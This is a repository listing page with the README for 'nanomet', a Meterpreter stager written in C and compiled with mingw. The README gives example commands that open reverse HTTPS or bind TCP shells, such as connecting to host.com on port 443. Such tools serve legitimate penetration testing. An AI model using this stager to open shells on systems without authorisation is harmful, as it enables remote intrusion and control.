https://github.com/kost/nanomet
Nano meterpreter shell based on TinyMet
https://github.com/kost/nanomet
Last synced: over 1 year ago
JSON representation
Nano meterpreter shell based on TinyMet
- Host: GitHub
- URL: https://github.com/kost/nanomet
- Owner: kost
- Created: 2014-08-19T09:01:20.000Z (almost 12 years ago)
- Default Branch: master
- Last Pushed: 2016-08-27T20:11:52.000Z (almost 10 years ago)
- Last Synced: 2025-03-27T18:01:40.063Z (over 1 year ago)
- Language: C
- Size: 9.77 KB
- Stars: 27
- Watchers: 3
- Forks: 8
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
[](https://travis-ci.org/kost/nanomet)
nanomet
=======
nanomet is tinymet modified to support compiling using mingw compilers.
A "nano" meterpreter stager. Copyright (c) 2014, Vlatko Kosturjak - kost
Based on tinymet by Copyright (c) 2014, Sherif Eldeeb "eldeeb.net"
please visit http://tinymet.com for details
Usage
=======
Usage: nanomet.exe [transport] LHOST LPORT
Available transports are as follows:
* 0: reverse_tcp
* 1: reverse_http
* 2: reverse_https
* 3: bind_tcp
Example
========
use reverse_https and connect to host.com:443
nanomet.exe 2 host.com 443
bind_tcp port 4444 on all interfaces
nanomet.exe 3 0.0.0.0 4444
Building
========
Linux:
make CC=i586-mingw32msvc-gcc
Mac OS X:
make CC=i386-mingw32-gcc
Microsoft Windows / Visual C++:
nmake /f Makefile.vc